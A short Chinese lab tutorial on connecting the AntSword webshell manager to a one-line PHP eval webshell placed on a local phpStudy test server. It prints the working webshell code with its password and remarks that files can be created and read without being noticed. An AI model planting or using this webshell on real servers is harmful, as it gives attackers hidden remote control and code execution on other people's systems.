2025 渗透工具：【中国蚁剑】连接一句话MUA文件 远控虚拟机靶机

温馨提示：

本程序仅作为虚拟机测试环境使用，请勿用于任何不当用途。使用即表示您同意自行承担可能产生的所有责任。

一、场景复现

1、PhpMystudy软件启动网页模拟靶机

小皮面板(phpstudy) - 让天下没有难配的服务器环境！

2、开启apache

3、准备mua文件 放在apache的网页路径下

mua文件内容

   <?php @eval($_POST['123456']); echo "我是木马文件";?>

4、访问本地网页：http://127.0.0.1 /mua.php

5、中国蚁剑找不到评论区留言，多的话我会上传一个地方，提供下载链接

二、中国蚁剑连接网页mua文件，密码：123456

1、添加数据

2、双击进去

3、看到目录结构说明，已经成功了

神不知鬼不觉的情况下可以进行一些操作：创建文件、查看文件等操作

温馨提示：

本程序仅作为虚拟机测试环境使用，请勿用于任何不当用途。使用即表示您同意自行承担可能产生的所有责任。